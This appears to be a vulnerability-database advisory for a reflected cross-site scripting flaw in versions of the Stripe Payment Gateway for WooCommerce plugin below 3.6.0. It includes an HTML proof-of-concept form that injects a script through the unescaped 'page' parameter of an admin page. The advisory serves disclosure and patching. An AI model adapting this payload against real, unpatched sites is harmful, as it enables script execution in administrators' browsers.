Stripe Payment Gateway for WooCommerce < 3.6.0 - Reflected Cross-Site Scripting (XSS)

2021-06-0700:00:00

wpvulndb

314

stripe payment gateway

woocommerce

xss

reflected

security exploit

cross-site scripting

JSON

The plugin did not sanitise or escape the page parameter before outputting back in an attribute, leading to a reflected Cross-Site Scripting issue

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=eh-stripe-overview" method="POST">
      <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>"' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

References

plugins.trac.wordpress.org/changeset/2543438

JSON